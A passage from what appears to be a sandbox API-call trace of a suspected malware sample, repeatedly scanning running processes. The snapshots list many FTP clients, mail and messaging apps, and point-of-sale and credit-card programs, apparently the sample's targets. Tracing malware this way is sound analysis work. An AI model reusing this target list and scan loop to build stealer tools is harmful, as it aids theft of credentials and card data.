pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0288.714] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0288.719] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.722] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0288.723] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0288.724] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0288.726] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0288.727] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.729] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0288.730] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0288.736] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.738] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0288.741] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0288.742] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0288.744] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0288.772] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0288.841] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0288.843] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0288.844] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0288.846] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0288.847] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0288.849] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0288.850] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0288.852] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0288.853] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0288.858] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0288.860] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0288.861] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0288.863] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0288.864] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0288.866] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0288.867] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0288.869] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0288.870] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0288.874] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0288.876] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0288.881] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0288.883] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0288.884] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0288.886] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0288.890] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0288.892] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0288.894] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0288.896] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0288.897] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0288.899] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0288.901] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0288.905] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0288.907] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0288.909] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0288.911] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0288.912] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0288.914] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0288.916] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0288.918] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0289.004] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0289.006] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0289.007] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0289.009] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0289.011] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0289.015] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0289.017] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0289.018] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0289.020] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0289.021] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0289.023] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0289.024] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0289.026] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0289.031] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0289.033] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0289.035] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0289.037] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0289.039] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0289.042] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0289.151] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0289.153] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0289.156] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.158] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0289.159] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0289.161] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0289.162] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0289.164] CloseHandle (hObject=0x2134) returned 1 [0289.164] Sleep (dwMilliseconds=0x64) [0289.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0289.407] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.409] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.410] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, 